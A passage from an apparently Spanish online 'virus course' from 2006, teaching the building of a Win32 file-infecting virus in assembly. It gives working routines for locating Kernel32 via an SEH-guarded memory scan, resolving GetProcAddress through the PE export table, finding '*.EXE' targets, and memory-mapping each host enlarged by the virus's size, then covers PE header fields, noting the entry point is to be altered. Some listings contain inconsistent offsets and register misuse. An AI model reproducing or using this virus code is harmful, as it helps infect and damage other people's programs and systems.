Vale, el valor que encontramos ah no va a ser exctamente el valor que estamos buscando, la direccin base sobre la que se ha cargado Kernel32.DLL y que nos dara el GetModuleHandle. Sin embargo y dado que Kernel32.DLL es un ejecutable como cualquier otro, sabemos que tiene una cabecera de ejecutable; esto significa por tanto que al principio tiene que haber una cadena de texto "MZ" que indique el principio del ejecutable (como nota histrica, se dice que estas iniciales, tambin presentes en ejecutables de Ms-Dos, se deben a que el autor del formato EXE era un programador llamado Mark Ziblowsky).
En fin, que en caso de que estis en un Windows 95 o 98 lo ms probable es que la direccin ah encontrada sea algo tipo 0BFF9A173h, por poner un ejemplo (esta direccin ejemplo es 0BFF70000h + 2A173h, sera que la funcin CreateProcess se encuentra en esa direccin).
En cualquier caso, tener algo como 0BFF9A173h es mucho mejor que no tener nada si tu virus no sabe si est en Win95, en NT o en qu otro de tantos sistemas Windows. Pero eso s, cmo cohone sacamos ahora de algo como eso la direccin base de la DLL?. Pues bien, el mtodo ms prctico es, si tenemos en EAX ese valor, hacer un bucle como este:
and eax,0FFFF0000h Bucle: sub eax,10000h cmp word ptr [eax],'MZ' jnz Bucle
Qu estamos haciendo con esto? Bien, lo primero es cargarnos las tres ltimas cifras del numerajo que nos han dado, as en nuestro ejemplo tendramos 0BFF90000h. As, le restamos 10000h y buscamos 'MZ'. Si estamos en Win95/98 no ser as, con lo que el jnz Bucle acta y volvemos. Ahora, sub eax,10000h lo convierte en eax = 0BFF70000h. Y efectivamente, ah est el MZ y tenemos la direccin base del Kernel32.DLL.
Bueno, se me ha olvidado un pequeo problemilla por el que nos puede petar tambin, pero es que las cosas una a una xD. Resulta que como dijimos en el primer o segundo captulo de este curso de virus, Windows, como todo sistema operativo ms o menos "actual", funciona por pginas de memoria de un determinado tamao, de las que a algunas tenemos acceso de escritura y/o lectura, y algunas no. Cul es el problema? Que si accedemos a una pgina de memoria a la que no tenemos permisos de lectura, el Windows se nos va a cabrear y nos dir MEEEEEEEEEEEC!!!!!!!!! MAAAAAAAAAAAAAAAAAL!!!!!!!, el programa se va a parar y va a cantar un poquito que hay un virus y tal xD.
Ahora, para solucionar esto (joder la verdad es que estoy metiendo caita en esta entrega, eh? x)) tenemos que pensar, qu pasa cuando el Windows se cabrea y dice que muy mal porque has intentado leer desde donde no tenas permiso? Pues que se genera lo que se llama una excepcin de fallo de pgina. Una excepcin, si recordis, es una especie de interrupcin a la que llama el sistema operativo cuando pasa algo raro; por ejemplo, existe la excepcin de divisin por cero, la de fallo de pgina y otras cuantas.
Por tanto, y dado que Windows nos lo deja fcil puesto que podemos tocar las rutinas de manejo de excepciones, pues nosotros mismos podemos solucionar este problema. Para ello, toquetearemos una estructura llamada Structured Exception Handler (SEH). Y como sigo pensando que nada como un poco de cdigo, veamos este:
SEH: xor edi,edi ; edi = 0 push dword ptr fs:[edi] mov fs:[edi],offset SEH_Handler mov eax,dword ptr ds:[esp+8] and eax,0FFFF0000h Bucle: sub eax,10000h cmp word ptr [eax],'MZ' jnz Bucle > SEH_Handler: mov esp,dword ptr ds:[esp+8] ; Restaurar pila jmp Bucle
Ay la ostia pero que es todo esooooooo vale ah vamos. Del SEH, Structured Exception Handler, nos va a interesar un puntero que se encuentra en la direccin de memoria fs:[0]. Para ello hacemos edi = 0, y empujamos a la pila el valor que hay en fs:[edi], o sea, en fs:[0]. Luego, colocamos en fs:[0] el offset de nuestro handler, con lo que a partir de ahora cada vez que se produzca una excepcin de esas que nos joden, pues el control pase a la rutina "SEH_Handler". El nico modo de que se produzca una excepcin es, como he dicho, que accedamos a una pgina de slo lectura, lo cual slo puede pasar cuando ejecutamos la instruccin "cmp word ptr [eax],'MZ'". Lgicamente y dado que para Kernel32.DLL tenemos permiso de lectura, si peta es que no estamos en l con lo que lo mejor es que sigamos restando 10000h y mirando de nuevo si coincide el MZ. Por eso, la rutina de SEH_Handler consiste primero en restaurar la pila como estaba antes (accin tipo aqui-no-ha-pasao-n), y de nuevo saltar al Bucle para que siga haciendo sus cosillas.
Por supuesto, despus de hacer esto tendremos que restaurar el SEH original y esas cosas; no tendremos ms que popearlo a fs:[0] de nuevo. Por cierto, hay una forma ms elegante de hacer todo esto con un call que deja en [esp] la rutina del SEH_Handler pero he preferido que se entienda antes de optimizar y tal. Cosa vuestra sacarla ;-).
En fin, que despus de toda esta movida ya tenemos la direccin base de Kernel32.DLL. Vale, ha sido un esfuerzo bastante grande pero merece la pena y ah la tenemos con nosotros. La nica pena es que ni siquiera acabamos de empezar, puesto que todava nos queda encontrar la direccin fsica de GetProcAddress. Pero aunque no os lo creis, lo que queda es sencillo con una buena referencia a mano como el libro de Matt Pietrek (Windows Programming Secrets) que recomiendo a todo el que se quiera meter a sako en virus para Windows... el to es el amo xDDD,
es un texto a bajo nivel sobre Windows que habla desde procesos a formato de ficheros a... yoques... por cierto que es raro de encontrar y creo que ya no se imprime, pero al menos la parte de formato ejecutable de Windows (un captulo entero) est circulando gratis por Internet as que buscando por Matt Pietrek y el ttulo del captulo (The Portable Executable and COFF OBJ Formats), lo encontris fijo. Me parece que voy a poner hasta una mini-bibliografa al final de este captulo, porque documentacin para Windows si bien es escasa la que hay es como oro en pao...
Bueno, mis comentarios de pelotilleo barato a Matt Pietrek os han dejado descansar unos segundos valiosos para tomar aire, pero ahora, formato PE en mano (PE, Portable Ejecutable, exes de Windows), vamos a ver de donde sacamos ese maldito GetProcAddress que tanto nos est costando ya que al menos sabemos que handler pasarle.
Vale, pues empezamos explicando una cosa graciosa sobre los ficheros PE en Windows. Para empezar, su cabecera "bsica" es la misma que la de un EXE de Ms-Dos, por qu? Pues por compatibilidad hacia atrs. As si ejecutas en Ms-Dos un fichero de Win32, te saldr el mensaje de "Que no, que no tienes Windows". La parte que imprime eso se llama "Dos Stub", y como Windows est muy optimizado, cuando carga una DLL o un ejecutable en memoria no se olvida de cargar tambin este Dos Stub aunque no sirva para nada.
El caso es que como vimos antes, un PE empieza por la cadena MZ, la de los antiguos ejecutables. Lo interesante es que cuando se trata de un PE, en el offset 03eh respecto al principio de la cabecera PE tiene una RVA al inicio de la cabecera PE real. Jejeje, si, una "RVA". Ale, otro trmino a explicar: RVA significa Relative Virtual Address, o sea, que es una direccin relativa respecto al principio del programa. En pocas palabras, que si la base del Kernel32.DLL era 0BFF70000h y una RVA dentro de l dice "1111h", lo que tendremos que hacer ser sumar esa direccin base y la RVA, haciendo 0BFF71111h en este caso.
As pues, en el offset 03ch tenemos la RVA a la cabecera PE, en este caso del Kernel32.DLL dado que estabamos buscando la direccin de la direccin virtual de GetProcAddress. El inicio de la cabecera PE (podemos comprobarlo pero no hace falta, Kernel32.DLL fijo que es un fichero PE ;) ) est formado por las letras PE y dos bytes a cero (PE\0\0). A partir de aqu, es desde donde vamos a encontrar la direccin que tanto ansiamos.
No voy a explicar - de momento porque no os libris - como est organizado un PE. De momento, lo que necesitis saber, es que en el inicio de la cabecera PE+78h tenemos justo la RVA de la seccin de exportaciones del fichero PE. Que para qu queremos la seccin de exportaciones? Pues porque all hay una lista muy maja de las funciones que exporta Kernel32.DLL, entre las cules est GetProcAddress. As que cogemos lo que hay en PE+78h y como es una RVA pues se lo sumamos a la direccin base del kernel, con lo que guay, ya tenemos acceso a la tabla de exportaciones.
Lo siguiente? Pues bueno, vamos a llamar .edata al lugar al que apuntaba esta RVA. Adems la seccin de exportaciones se llama .edata siempre as que queda mejor de esa forma. Pues bien, en [.edata+20h] tenemos otra RVA (y van...) que esta vez es lo que llamamos el "AddressOfNames", que es una lista de RVAs, cada una al nombre de una API. Por supuesto, a cada RVA hay que sumarle la direccin base del Kernel32.DLL...
Veamos lo que hemos estado haciendo con un dibujo, que se entender mucho mejor:
O sea, que con la RVA en MZ+3ch hemos visto un sitio en el que en 78h tenemos otra RVA, esta vez a la tabla de exportaciones, y su AddressOfNames nos lleva a otra lista de RVAs de las cuales cada una apunta a un nombre. Bien, ahora resulta fcil pensar lo que tenemos que hacer, verdad?. Tenemos que coger esa lista de RVAs y comprobar los nombres hasta que demos con uno que sea "GetProcAddress". La cosa es algo ms complicada y vamos a tener que tirar de AddressOfOrdinals y AddressOfFunctions, pero de momento no vamos mal con esto.
As pues, lo indicado en el dibujo unido a la comparacin de los nombres se puede hacer en un listado ensamblador como el siguiente:
; EDI tiene la direccin a MZ, o sea, a la base de kernel32.dll mov eax, dword ptr ds:[edi+03ch] add eax, edi ; aadimos edi por lo de la RVA, recordemos mov esi, dword ptr ds:[esi+078h] add esi, edi ; ahora ya tenemos la seccin de exportaciones mov edx, dword ptr ds:[esi+020h] xor ecx, ecx Bucle: mov eax, dword ptr ds:[edx] add eax, edi cmp dword ptr ds:[eax],'PteG' jnz NoLoEs cmp dword ptr ds:[eax+4h],'Acor' jnz NoLoEs cmp dword ptr ds:[eax+8h],'erdd' jnz NoLoEs jmp Cojonudo ; Llegamos a NoLoEs si el nombre no coincide NoLoEs: add edx,4h ; para apuntar al siguiente RVA de la lista inc ecx jmp Bucle Cojonudo:
Evidentemente hay formas bastante menos bestias de hacerlo que sta, y recomiendo al programador buscarla... y ahora, llega la parte divertida, pa que coo vale esto si yo ya me sabia el nombre? Vale lo he encontrao soy la ostia pero esto no me vale pa n. Pues s, si que vale; si miris el cdigo de antes hay algo que no sabris a qu viene, y es la modificacin sobre ECX... que se incrementa cada vez que fallamos. Por qu lo estamos incrementando? Ah amigo, ah est la madre del cordero.
Os acordis de eso llamado AddressOfNameOrdinals? Bueno, voy a explicar ahora al completo cmo se saca la direccin de funcin de la API, de cualquier funcin. Hay que averiguar primero el nmero la de veces que hemos tenido que recorrer las direcciones de nombres, y ese nmero confrontado con el AddressOfOrdinals nos va a dar otro bonito nmero. Cogemos el valor en ECX, lo multiplicamos por dos (rol ecx,1), cogemos la RVA llamada "AddressOfNameOrdinals" que est en [.edata+24h] y lo sumamos todo. O sea, todo no, sumamos la RVA del AddressOfNameOrdinals + base del kernel + ecx*2. En esa direccin vamos a obtener un nmero, que es el Ordinal de la funcin, de tamao Word.
Ahora s, cogemos la RVA que apunta a AddressOfFunctions que est en [.edata + 1Ch], le sumamos la base del kernel y el nmero que hemos cogido multiplicado por cuatro (rol reg,2), y justo ah, est la RVA a la funcin GetProcAddress. O sea, en cdigo tenemos algo como esto:
; Tenemos en ECX el numero de desplazamientos del bloque de antes. rol ecx,1h mov edx,dword ptr ds:[esi+24h] ;AddressOfNameOrdinals add edx,edi ; edi = base del kernel add edx,ecx movzx ecx,dword ptr ds:[edx] mov edx,dword ptr ds:[esi+01ch] add edx,edi rol ecx,2h ; * 4 add edx,ecx mov eax,dword ptr ds:[edx] add eax,edi ; Ajustamos a la base kernel
Con estas lneas de cdigo, tenemos ya el GetProcAddress, con lo que vamos a poder sacar llamando con CALL a esa funcin, las direcciones del resto de las funciones de Kernel32.DLL que vamos a necesitar. Os aconsejo que os montis un bucle que tenga en cuenta el nmero de funciones que queris extraer y vaya llamando recursivamente a GetProcAddress de una forma como esta:
; Tenemos en ECX el numero de desplazamientos del bloque de antes. mov dword ptr ds:[GPAddress+ebp],eax push offset direccion + ebp ; direccion del nombre de la funcin push edi ; La direccin del kernel call GetProcAddress GPAddress equ $-4 direccion: db 'FuncionQueQuiero',0 ; el ,0 es importante :)
Como veis, para llamar a GetProcAddress tenis que empujar la direccin donde tenis en vuestro virus cada nombre de la API, luego la direccin base del kernel32.dll y llamar. Ah, se me olvidaba, como veris con la direccin de la funcin GetProcAddress lo que hago es moverla a [GPAddress+ebp]. La razn en sencilla, as el resultado se rellena en el call y se puede hacer la llamada a la direccin que acabamos de extraer.
Un ltimo apunte antes de acabar esta seccin, es algo que yo me pregunt cuando lo vi y me imagino que vosotros igual... para qu tener un array, o sea, una lista de RVAs de nombres de funcin, luego una lista de ordinales para relacionar el rden en que estn en esa lista con un ordinal y finalmente una lista por nmero ordinal para acceder a la funcin? O sea, para qu tres listas cuando podra haberse hecho una sla con por ejemplo bloques de dos campos que contuvieran la direccin de la funcin y otro la RVA al nombre de la API?
Evidentemente una solucin como la segunda sera ms optimizada y ms cmoda para el programador, por qu liar las cosas tanto de una forma tan absurda? Pues la respuesta es simple... se os ha olvidado que estamos en Windows?. Windows es as de intil, as de absurdo... y a quien no le convenzan mis argumentos puede buscar en Internet un fichero llamado dancemonkeyboy.mpg cuyo protagonista es Steve Balmer, presidente de Microsoft.
Y eso que no os cuento cmo se guarda la fecha en los ficheros, que entonces si que ibais a pensar que estos tos programan de tripi... para el que tenga curiosidad que se mire la estructura FILETIME en Windows (en el famoso Win32.hlp que necesitaris viene), eso s, recomendado fumarte unos canutos y mirarlo con algn colega programador y aprovechar as el "momento risas", sobre todo si a partir de eso intentis hacer cdigo para averiguar cual es la fecha del archivo xDDDDD. Ser todo lo Universal Time de Supadre que quieras pero... xDDD
Pero bueno dejemos de meternos con Windows, que es tiempo de buscar ficheros para infectar y adems acabo de descubrir una nueva gran funcionalidad dada la maravillosa integracin de IExplorer y Windoze, que es que puedes marcar favoritos en tu papelera de reciclaje ^^
Esto va a ser bastante ms simple que todo lo que hemos hecho anteriormente, y nos servir como un descanso despus de esto; las funciones para buscar ficheros son, por suerte, bastante sencillas. Lo nico que vamos a tener que indicarle a estas dos funciones, FindFirstFileA y FindNextFileA, es un offset con la mscara del tipo de archivo a buscar. Lo ms tpico, ser que utilicemos algo como '*.exe' para ir buscando los ejecutables del directorio actual.
La cosa es sencilla; una vez que hagamos un FindFirst, usaremos el resto de las veces FindNext hasta que no encontremos nada ms (que nos ser indicado en lo que nos devuelva en EAX la funcin). Descripcin de las funciones y cdigo:
HANDLE FindFirstFile( LPCTSTR lpFileName, // address of name of file to search for LPWIN32_FIND_DATA lpFindFileData // address of returned information );
El primer parmetro es sencillo, es un puntero al nombre del fichero; el segundo, es un puntero a una estructura interna que tenis que tener en vuestro programa, un bloque de tamao SIZE WIN32_FIND_DATA bytes, y con el siguiente formato para acceder a los datos que nos devuelve la llamada:
WIN32_FIND_DATA STRUC
WFD_dwFileAttributes DD ? WFD_ftCreationTime FILETIME ? WFD_ftLastAccessTime FILETIME ? WFD_ftLastWriteTime FILETIME ? WFD_nFileSizeHigh DD ? WFD_nFileSizeLow DD ? WFD_dwReserved0 DD ? WFD_dwReserved1 DD ? WFD_szFileName DB MAX_PATH DUP (?) WFD_szAlternateFileName DB 13 DUP (?) DB 3 DUP (?) ; dword padding
FT_dwLowDateTime DD ? FT_dwHighDateTime DD ?
FILETIME ENDS
Por cierto, que esto puede meterse en un include :). Aqu cdigo, escrito de forma sencillita:
; Esto para el FindFirst lea eax,[Find_Win32_Data+ebp] push eax lea eax,[Search_File+ebp] push eax mov eax,dword ptr [API_FindFirst+ebp] call eax ; Esto para FindNext (por ejemplo) lea eax,[Find_Win32_Data+ebp] push eax push ebx mov eax,dword ptr [API_FindNext+ebp] call eax Search_File: db '*.EXE',0 ; Para encontrar solo EXEs ;)
Y en fin, con ms cdigo que explicaciones (al fin y al cabo esto ya no es tan complicado no? slo es una estructura sobre la que se escriben los resultados de las llamadas), ya tenemos escrita la base mnima de un virus para Win32.
""
Curso gratis creado por Wintermute . 22 Febrero 2006 Practica Forex Trading $100.000 Gratis durante 30 das con Revolucionaria Plataforma Trading. www.ac-markets.com/forex/ Anuncios Google
< anterior | 1 .. 12 13 14 15 16 .. 18 | siguiente >
Infeccin de ficheros PE Introduccin Hasta ahora ya hemos obtenido la forma de resituar los accesos a datos mediante el Delta Offset, llamar a la API de Windows y finalmente buscar ficheros; y ahora qu? Bueno, pues ahora es el momento en el que nuestro bichito se ha encontrado con un fichero EXE (porque la mscara para buscar ficheros es *.EXE), y tiene unas ganas muy terribles de infectarlo. Ayudmosle: Formas de acceder a ficheros Existen habitualmente dos formas distintas de acceder a ficheros; una, la clsica, en realidad es bastante engorrosa y deberamos olvidarnos de ella cuanto antes, porque supone un gasto absurdo de tiempo y espacio. La otra, ficheros mapeados en memoria, es la que vamos a utilizar. Mediante la clsica, accedamos a ficheros mediante un puntero que se desplazaba al leer/escribir o por llamadas a la API. As, al escribir o leer del fichero pues lea o escriba justo donde marcaba el puntero, y este avanzaba. En sistemas operativos antiguos como Ms-Dos esta era la nica forma de hacerlo, y de hecho los de Windows lo mostraron como un gran avance en Win32 (aunque los sistemas tipo Unix llevaban hacindolo eones, pero as son los caminos del marketing). El caso es que el sistema bueno para manejar ficheros, que usaremos tanto en Win32 como en Linux, es lo que se conoce como "ficheros mapeados/proyectados en memoria", muchas veces en Windows simplemente se dice MMF, Memory Mapped Files. La base de este sistema est en el sistema de paginacin que describ all por los principios del curso de virus; en lugar de ir cargando y escribiendo porciones del fichero, lo que se
hace al abrir un fichero por mapeado en memoria es hacer que unas cuantas pginas del proceso (dependiendo del tamao del fichero abierto) se asignen a las posiciones de disco que contienen el fichero. Para entender esto supongamos un fichero de 11Kb y que el tamao de pginas es de 4Kb. As, se hara que la primera pgina apuntase a los 4 primeros Kbytes del fichero, la segunda a los 4 segundos y la tercera a los 3 que faltan. Pero estas pginas no contienen los datos en s del fichero, sera absurdo cargarlo todo dirctamente puesto que hay partes del fichero a las que vamos a acceder y partes a las que no. Entonces, cuando accedamos a una parte de fichero en lectura por primera vez accediendo a las posiciones de memoria de las pginas, el SO va a generar un error de fallo de pgina puesto que se intenta acceder a un trozo de memoria que no est ah sino que reside en el disco duro (como sucede cuando una pgina ha sido desalojada de memoria principal para meterse en el disco duro, con el sistema de memoria virtual). El caso es que al surgir esta excepcin de fallo de pgina el SO va a traer a memoria esa pgina con lo que se realizar la lectura; pero slo de la parte a la que hemos accedido. Las ventajas son evidentes; no tenemos que estar pendientes de llevar un puntero de acceso al fichero manejado por la API sino que simplemente accedemos a memoria y escribimos en ella para hacerlo sobre el fichero. Cuando cerramos el fichero, los cambios que hemos hecho en las pginas correspondientes al fichero se actualizan en el disco duro. Pasando ahora un poco a la prctica, vamos a necesitar tres funciones para realizar la apertura de ficheros en Windows mediante Memory Mapped Files: HANDLE CreateFile( LPCTSTR lpFileName, // address of name of the file DWORD dwDesiredAccess, // access (read-write) mode DWORD dwShareMode, // share mode LPSECURITY_ATTRIBUTES lpSecurityAttributes, // address of security descriptor DWORD dwCreationDistribution, // how to create DWORD dwFlagsAndAttributes, // file attributes HANDLE hTemplateFile // handle of file with attributes to copy ); Esta es la ayuda que nos presenta el Win32.HLP. De aqu podemos ver que lpFileName es un puntero al nombre del fichero (que sacaremos de la estructura WIN32_FIND_DATA de antes, cuando buscamos ficheros), en DesiredAccess tendremos opciones de lectura y escritura (GENERIC_READ y GENERIC_WRITE), dwShareMode trata sobre la comparticin del fichero abierto, lpSecurityAttributes (que no necesariamente es soportado, atributos de seguridad del fichero), dwCreationDistribution que trata sobre la forma de acceder (si no existe lo creamos? si existe sobreescribimos? slo lo abrimos? etc), y otros dos sobre opciones de acceso que tampoco trataremos en detalle; tampoco hace falta darle demasiadas vueltas, con una frmula sencilla estar solucionado y no hay que tenerlo todo en cuenta: push 0 push 0 push 3 push 0 push 1 push 0C0000000h ; Read/Write access lea eax, [Find_Win32_Data+WFD_szFileName+ebp] push eax call dword ptr [API_Create+ebp] ;
Delta offset en ebp Ah por cierto fijos que la forma de empujar los parmetros es en el rden inverso al descrito en las funciones de win32.hlp, que luego nos rallamos por la tontera cuando el fallo era ese xD. Bueno, a lo que iba; dwFlagsAndAttributes y hTemplateFile no nos importan :) y empujamos un cero a la pila. El 3 que empujamos con dwCreationDistribution indica OPEN_EXISTING, es decir, abrir y punto slo si existe el fichero. El siguiente cero que empujamos es porque no necesariamente tiene estructura de atributos de seguridad (esto se aplica en NT por ejemplo, pero no en un 95/98 donde no existen estos sistemas de seguridad). El 0C0000000h se refiere al acceso deseado (lectura/escritura) y finalmente el W32_Data+WFD_szFileName indica el offset respecto a la estructura Win32_Find_Data donde se encuentra el nombre obtenido mediante FindFirst/FindNext. El caso es que esta llamada a funcin nos devolver un "handler" en EAX. Este handler es un valor que ms nos vale conservar, pues se va a utilizar como referencia para manejar el fichero en posteriores ocasiones; la cosa es sencilla, en los datos internos del proceso que se est ejecutando (en este caso un fichero infectado con nuestro virus) hay una serie de "handlers" o descriptores que se relacionan con ficheros abiertos (aparte de, de forma standard, con el input, output, etc, pero esto ya es otra historia). Esta, es la forma en que se manejan los ficheros; el descriptor o handler que tenemos en EAX es la referencia para poder seguir operando con el fichero abierto. Lo mejor entonces es guardar eax en algn registro donde lo tengamos controlado y no lo perdamos en toda la infeccin, pues lo tendremos que utilizar luego para cerrar el fichero abierto y guardar los cambios. mov ebx,eax inc eax jnz No_Hay_Problema Esto sera la comprobacin justo posterior a la apertura de fichero; salvamos EAX en EBX, y comprobamos con el Inc EAX si es igual a 0FFFFFFFFh (o -1, que incrementandolo dara cero). Si lo es, dejamos de infectar porque hubo algn problema al abrir el fichero (nunca est de ms la comprobacin de errores). La siguiente funcin que vamos a tener que usar para nuestro cometido es la de CreateFileMapping, cuya estructura es como sigue: HANDLE CreateFileMapping( HANDLE hFile, // handle of file to map LPSECURITY_ATTRIBUTES lpFileMappingAttributes, // optional security attributes DWORD flProtect, // protection for mapping object DWORD dwMaximumSizeHigh, // high-order 32 bits of object size DWORD dwMaximumSizeLow, // low-order 32 bits of object size LPCTSTR lpName // name of file-mapping object );
Ya vemos que uno de los parmetros, HANDLE hFile, es el handler que nos pasaron antes en EAX; como dije vamos a necesitarlo bastante para seguir tratando con el fichero. Tenemos de nuevo atributos de seguridad y proteccin, el nombre del objeto mapeado (se puede poner como 0), y otro campo importante que es el del tamao de fichero; por qu importante? Pues bien, porque esto va a determinar el tamao del fichero cuando lo cerremos. Si determinamos un tamao del objeto de 20k y era un fichero de 11k, se van a mapear 20k en memoria (los ltimos 9 sin informacin coherente), y se va a salvar cuando cerremos. Como os podis imaginar no hay nada como poner como tamao del objeto justo el del fichero mas el de nuestro virus ;-) mov edi,dword ptr [Find_Win32_Data+WFD_nFileSizeLow+ebp] add edi,virus_size ; Host plus our size push 0 push edi push 0 push PAGE_READWRITE ; R/W push 0 ; Opt_sec_attr push ebx ; Handle call dword ptr [API_CMap+ebp] En el pequeo listado puede verse lo que hacemos; EDI tiene el tamao del fichero, al que se le aade el del virus (el tamao del virus est calculado con EQUs y tal); ponemos ceros para lpName, SizeHigh y OptSecAttr, y para la proteccin del fichero mapeado permiso de lectura/escritura (PAGE_READWRITE). Finalmente empujamos el handler y llamamos a la funcin; en esta ocasin si la funcin falla Windows no nos va a devolver EAX=-1 sino EAX=0 lo que se puede comprobar con un or eax, eax. Supongo que para hacernos la vida ms variada xD. La cuestin es que, si no falla (que no debera, no?) nos devolver en EAX un nuevo handler del que tambin habr que estar pendientes. Y en fin, nos acercamos al momento decisivo ;-). Slo nos falta utilizar la tercera funcin, ya que hemos abierto el fichero, lo hemos de nuevo abierto mediante mapeado en memoria, y ahora haremos el mapeado efectivo... para ello, la funcin MapViewOfFile; y pasamos dirctamente a dar su especificacin: LPVOID MapViewOfFile( HANDLE hFileMappingObject, // file-mapping object to map into address space DWORD dwDesiredAccess, // access mode DWORD dwFileOffsetHigh, // high-order 32 bits of file offset DWORD dwFileOffsetLow, // low-order 32 bits of file offset DWORD dwNumberOfBytesToMap // number of bytes to map ); Bueno esta ya tiene menos parmetros, no? xD. El Handle que hay que enviarle es el que nos dio CreateFileMapping, el DesiredAccess es FILE_MAP_ALL_ACCESS, dwFileOffsetHigh y Low los pondremos a cero (es una indicacin a mano que podemos hacer de que haga el mapeado en memoria en el lugar donde nos d a nosotros la gana lo cual tampoco es necesario), y eso s, en NumberOfBytesToMap meteremos el valor de EDI que habamos puesto antes, es decir, el tamao del fichero con nuestro virus. push edi push 0 push 0 push FILE_MAP_ALL_ACCESS push eax ; handle call dword ptr
[API_MapView+ebp] As que con esto ya est, tenemos ahora en EAX algo muy muy importante, que es la base address a partir de la cual acceder al fichero mapeado; es decir, que si el fichero se carg en la direccin 0700000h, EAX va a contener justo esa cifra, el principio del fichero... con lo que ya vamos a tenerlo dispuesto para poder abrir e infectar a nuestro gusto. Por ltimo, advertir que esto que hemos abierto luego hay que cerrarlo. Para ello hay dos funciones, UnmapViewOfFile y CloseHandler. Slo hay que pasarles un parmetro, que es la base donde se ha cargado el fichero en memoria (el EAX de antes, conservadlo), y en caso de CloseHandler, el handler que nos pasaron al abrir el fichero. El cdigo para hacerlo es obvio porque slo hay que empujar un valor y llamar a la API, aun as copio la especificacin de las funciones: BOOL UnmapViewOfFile( LPVOID lpBaseAddress // address where mapped view begins );BOOL CloseHandle( HANDLE hObject ); Pues as de sencillo... por cierto, hay un detalle que quiz os est escamando; al empujar valores a la pila utilizo valores como FILE_MAP_ALL_ACCESS, que si GENERIC_READ, que si tal; sin embargo, si ponis eso as, a pelo, el Tasm os va a dar errores de compilacin dicindoos que qu son esas palabras que habis metido ah y que no significan nada. Lo que necesitis son ficheros de definicin. Por ejemplo, el 0C0000000h en CreateFile lo met a pelo; en realidad nosotros evidentemente no estamos empujando a la pila ninguna palabra que diga GENERIC_READ o lo que sea, sino que empujamos un nmero. Por suerte, se puede conseguir la conversin de esas palabras a nmeros en muchos includes de ayuda por ah desperdigados, puesto que cosas como escribir "GENERIC_READ" lo que pretenden es hacernos la vida ms fciles a los programadores en lugar de tener que recordar qu bits indican qu cosa en cada uno de los tipos de parmetros a API que puedas invocar. En fin, as, qu remedio, tendris que buscar algn include decente; al fin y al cabo esto es necesario pues en las referencias a funciones que encontris en ayudas como el Win32.hlp no vais a ver el valor hexadecimal o de mscara de bits de lo que tenis que empujar a la pila para hacer determinadas cosas con funciones, sino tan slo estos nombres que han de ser traducidos. Tarde o temprano, pues, tendris que usar algn //"fichero include" //de referencia para programar (hay por ejemplo una de Jacky Qwerty llamada Win32api.inc que sali en 29A#2 por ejemplo, y probablemente tendris definiciones en compiladores como Visual Basic, etc etc etc) Formato PE (Portable Ejecutable)
Ya no puedo dejarlo para ms adelante, hay que echarle un vistazo bien a fondo al formato de los ejecutables de Windows, conocido como PE (Portable Ejecutable), ya que se trata de algo necesario si queremos infectarlos, verdad?. Conseguimos averiguar la direccin de GetProcAddress en la export table aun sin explicar mucho como esta organizado un PE, pero esto ya se hace necesario a la hora de una infeccin seria. Slo comentar, que para una informacin ms amplia y detallada del formato PE nada como buscar el captulo de Matt Pietrek de su libro "Windows 95 Programming Secrets", llamado "The Portable Executable and COFF OBJ Formats". S que hay alguna copia en la red as que es de esas cosas que es interesante que busquis. En cualquier caso, intentar documentar al menos lo necesario para poder infectar un fichero de Windows. Lo primero, es decir que el fichero ejecutable en disco es bastante parecido al aspecto que tendr en memoria; un fichero PE est dividido en piezas por as decirlo, con cierta informacin sobre cmo colocar esas piezas en memoria en su estructura en disco. En la cabecera PE se indicar la direccin en la que preferira ser ubicado en memoria, as como, para cada seccin, la direccin relativa (RVA) en la que deberan colocarse sus secciones respecto a esta direccin base. Las referencias a datos y dems, dependientes de la ubicacin en memorias, sern recalculadas dinmicamente al cargar el fichero en memoria. As pues, el esquema bsico de un PE es el siguiente: Cabecera 'MZ' (Ms-Dos) File Header (PE) Optional Header Tabla de secciones Secciones .edata, .idata, .data, .text, .reloc, etc //Cdigo de debuggeo (opcional) // Vayamos por partes: - Cabecera 'MZ' Esta va a servir fundamentalmente para dos cosas; por un lado nos va a mostrar un mensaje de "no, esto no es Windows" cuando se intente ejecutar el fichero desde alguna versin antigua de Ms-Dos. Por otro, tendr un interesante puntero en el desplazamiento 03ch hacia la cabecera PE. Por supuesto, adems tiene la gran ventaja de que aunque para un programa en memoria no sirva para nada se carga en ella para ocupar ms espacio, otro gran ejemplo de optimizacin en su casa gracias a Microsoft(tm).
- File Header Esta ya es la cabecera PE en s. Sus 4 primeros bytes van a ser las letras PE y dos bytes a cero. El resto de los campos son los siguientes: Desplazamiento Tamao y nombre Contenido 00h DWORD Cabecera Su contenido es PE/0/0 04h WORD Machine Tipo de mquina para la que se compil; Intel I386 corresponde a 014Ch 06h WORD NumberOfSections Nmero de secciones contenidas en el programa 08h DWORD TimeDateStamp Fecha y hora en la que el fichero fue producido en otro extrao formato xD 0Ch DWORD PointerToSymbolTable Slo utilizado en ficheros OBJ y los ejecutables con opciones de debugging 10h DWORD NumberOfSymbols Relacionado con el anterior 14h WORD SizeOfOptionalHeader Tamao de la cabecera opcional (que normalmente si va a estar presente, faltara en caso de los ficheros OBJ) 16h WORD Characteristics Indica si es una DLL, un EXE o un OBJ - Optional Header La cabecera opcional tambin la vamos a tener muy en cuenta; la forma de acceder a ella es simple, ya que est justo despus de la File Header. Exctamente est en la posicin 18h respecto a la cabecera PE; de hecho y a efectos de que vamos a utilizarla tanto como la File Header, considerar como si el desplazamiento fuera //respecto a la File Header// en la siguiente tabla (en la que eso s voy a omitir las partes que no me resultan importantes, puesto que se extiende hasta un desplazamiento 78h desde este 18h sin contar el array variable de Image_Data_Directory que lo alarga de forma variable) Realmente, de aqu en principio habremos de tener pocas cosas en cuenta, aunque en particular ser importante modificar como es evidente el AddressOfEntryPoint. La estructura DataDirectory contiene siempre RVA y tamao de algunos trozos importantes del fichero como explica la tabla; en particular, resultar cmodo a la hora de buscar exportaciones e importaciones, pues son las dos primeras a las que siempre hace referencia; en 78h tendremos la RVA a .edata, en 7Ch su tamao, en 80h la RVA a .idata y en 84h el tamao de esta. - Tabla de secciones
